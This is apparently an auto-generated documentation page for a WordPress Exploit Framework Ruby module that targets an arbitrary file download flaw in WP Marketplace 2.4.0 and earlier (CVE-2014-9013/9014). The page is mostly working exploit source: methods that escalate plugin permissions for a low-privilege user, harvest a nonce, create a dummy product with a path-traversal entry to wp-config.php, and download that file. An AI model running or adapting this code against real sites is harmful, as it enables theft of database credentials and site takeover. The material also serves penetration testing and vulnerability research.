class Wpxf::Auxiliary::WpMarketplaceV24FileDownload
Attributes
download_id[RW]
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 6 def initialize super update_info( name: 'WP Marketplace <= 2.4.0 Arbitrary File Download', desc: %( This module exploits a vulnerability which allows registered users of any level to download any arbitrary file accessible by the user the web server is running as. ), author: [ 'Kacper Szurek', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '7861'], ['CVE', '2014-9013'], ['CVE', '2014-9014'], ['URL', 'http://security.szurek.pl/wp-marketplace-240-arbitrary-file-download.html'] ], date: 'Mar 21 2015' ) register_options([ StringOption.new( name: 'user_role', desc: 'The role of the user account being used for authentication', default: 'Subscriber', required: true ) ]) end
Public Instance Methods
before_download()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 116 def before_download return false unless modify_plugin_permissions emit_info 'Modified plugin permissions successfully', true @nonce = fetch_ajax_nonce return false unless @nonce emit_info "Acquired nonce \"#{@nonce}\"", true self.download_id = "1#{Utility::Text.rand_numeric(5)}" create_product end
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 38 def check check_plugin_version_from_changelog('wpmarketplace', 'readme.txt', '2.4.1') end
create_product()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 94 def create_product res = execute_post_request( url: full_uri, body: { '__product_wpmp' => @nonce, 'post_type' => 'wpmarketplace', 'id' => @download_id, 'wpmp_list[base_price]' => '0', 'wpmp_list[file][]' => remote_file }, cookie: session_cookie ) unless res && (res.code == 200 || res.code == 302) emit_error 'Failed to create dummy product' emit_error res.inspect, true return false end true end
default_remote_file_path()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 46 def default_remote_file_path '../../../wp-config.php' end
download_request_method()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 129 def download_request_method :post end
download_request_params()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 137 def download_request_params { 'wpmpfile' => download_id } end
downloader_url()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 133 def downloader_url full_uri end
fetch_ajax_nonce()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 73 def fetch_ajax_nonce res = execute_post_request( url: full_uri, body: { 'action' => 'wpmp_pp_ajax_call', 'execute' => 'wpmp_front_add_product' }, cookie: session_cookie ) nonce = res.body[/name="__product_wpmp" value="([^"]+)"/i, 1] if res&.code == 200 unless nonce emit_error 'Failed to acquire a download nonce' emit_error res.inspect, true return false end nonce end
modify_plugin_permissions()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 54 def modify_plugin_permissions res = execute_post_request( url: full_uri, body: { 'action' => 'wpmp_pp_ajax_call', 'execute' => 'wpmp_save_settings', '_wpmp_settings[user_role][]' => datastore['user_role'].downcase }, cookie: session_cookie ) unless res && res.code == 200 && res.body =~ /Settings Saved Successfully/i emit_error 'Failed to modify the plugin permissions' return false end true end
requires_authentication()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 42 def requires_authentication true end
working_directory()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 50 def working_directory 'wp-content/plugins/wpmarketplace' end